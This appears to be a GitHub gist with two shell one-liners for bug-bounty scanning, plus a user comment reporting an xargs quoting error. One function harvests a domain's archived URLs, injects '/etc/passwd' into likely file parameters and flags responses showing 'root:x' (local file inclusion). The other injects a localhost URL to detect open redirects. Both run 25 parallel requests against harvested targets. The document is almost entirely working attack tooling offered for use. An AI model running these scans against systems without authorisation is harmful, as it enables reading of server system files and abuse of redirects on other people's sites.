@dwisiswant0
Last active March 12, 2024 17:17
One-liner to get Open-redirect & LFI
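lfi() {
# Each URL is NUL-delimited and handed to sh as "$1", so quotes or shell metacharacters in a harvested URL are not parsed by xargs or the shell.
gau "$1" | gf lfi | qsreplace "/etc/passwd" | tr '\n' '\0' | xargs -0 -P 25 -I % sh -c 'curl -s "$1" 2>&1 | grep -q "root:x" && echo "VULN! $1"' _ %
}
open-redirect() {
# LHOST is passed to the child shell as "$2"; a local variable is not visible inside sh -c, which left the original grep pattern as just "Location: ".
local LHOST="http://localhost"; gau "$1" | gf redirect | qsreplace "$LHOST" | tr '\n' '\0' | xargs -0 -P 25 -I % sh -c 'curl -Is "$1" 2>&1 | grep -q "Location: $2" && echo "VULN! $1"' _ % "$LHOST"
}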

Sicks3c commented Sep 27, 2020

Thanks for the one-liner

I get this error when running any of them
xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option
